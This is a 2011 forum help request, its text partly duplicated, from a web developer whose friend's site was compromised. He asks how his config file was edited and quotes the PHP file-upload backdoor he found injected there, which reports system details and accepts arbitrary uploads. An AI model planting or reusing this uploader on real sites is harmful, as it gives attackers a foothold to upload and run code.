My website hacked.
Posted: Thu Oct 13, 2011 4:59 am
Hello,
I have been a web developer for about 10 years. I was asked by a friend to make a site for him because his previous site was hacked and messed up. Now i think i keep my security pretty tight and was positive something like that wouldnt happen to my site. The dumb thing that i did was keep the old site on the server (friend asked me to because there were some pictures there that she wanted later). I just moved it to a whole new directory and renamed it to old_site or something.
Now one day i find out that something is wrong. First there is an upload script written in one of my main config files and secend someone has allready uploaded something.
My main questions are:
1) Im pretty sure the attack came somehow through the old_site that i kept (now deleted) but even so how is it possible to directly edit my config file?
2) I was able to remove the upload script and the uploaded file but i dont know what did the uploaded file do? Im going to post the script uploaded, can anyone guess what was its purpouse?
The upload script in my config file:
The uploaded file: http://justpaste.it/jbw (alot of code so i copyd it elsewhere)
Would be thankful for any help
I have been a web developer for about 10 years. I was asked by a friend to make a site for him because his previous site was hacked and messed up. Now i think i keep my security pretty tight and was positive something like that wouldnt happen to my site. The dumb thing that i did was keep the old site on the server (friend asked me to because there were some pictures there that she wanted later). I just moved it to a whole new directory and renamed it to old_site or something.
Now one day i find out that something is wrong. First there is an upload script written in one of my main config files and secend someone has allready uploaded something.
My main questions are:
1) Im pretty sure the attack came somehow through the old_site that i kept (now deleted) but even so how is it possible to directly edit my config file?
2) I was able to remove the upload script and the uploaded file but i dont know what did the uploaded file do? Im going to post the script uploaded, can anyone guess what was its purpouse?
The upload script in my config file:
Code: Select all
<?php
echo '<b><br><br>'.php_uname().'<br></b>';
echo '<form action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">';
echo '<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '<b>Upload BY akas06 [at] hackermail.com !!!</b><br><br>'; }
else { echo '<b>Upload BY akas06 [at] hackermail.com !!!</b><br><br>'; }
}
?>
รต
Would be thankful for any help